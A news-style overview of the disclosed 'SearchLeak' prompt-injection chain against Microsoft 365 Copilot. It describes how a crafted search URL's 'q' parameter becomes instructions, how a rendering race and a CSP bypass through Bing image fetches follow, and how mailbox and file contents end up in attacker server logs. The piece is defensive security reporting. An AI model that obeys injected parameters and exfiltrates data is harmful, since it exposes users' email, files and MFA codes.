Overview
- Varonis publicly disclosed the SearchLeak proof-of-concept on June 15–16 and Microsoft says it has mitigated the flaw on its backend and issued CVE-2026-42824 so customers do not need to take action.
- SearchLeak chains three specific flaws: a parameter-to-prompt injection that turns the 'q' search parameter into instructions, an HTML rendering race that lets raw markup run before sanitization, and a Content Security Policy bypass that uses Bing’s server-side image fetch as an exfiltration proxy.
- In practice an attacker can send a crafted m365.cloud.microsoft search URL that makes Copilot search a signed-in user’s mailbox or files, embed the stolen text inside an image URL, and cause Bing to fetch that URL so the attacker can read the data from their server logs.
- The chain could expose high-value enterprise material that Copilot can index, including email contents, calendar items, OneDrive and SharePoint files, and time-sensitive items like one-time MFA or password-reset codes; researchers say there are no confirmed in-the-wild exploits reported so far.
- Because Copilot Enterprise is a managed cloud service, tenant admins cannot patch the service themselves; defenders are advised to monitor Copilot Search URLs and unusual Bing image requests, reduce what Copilot indexes, and use layered testing and detection to limit future blast radius.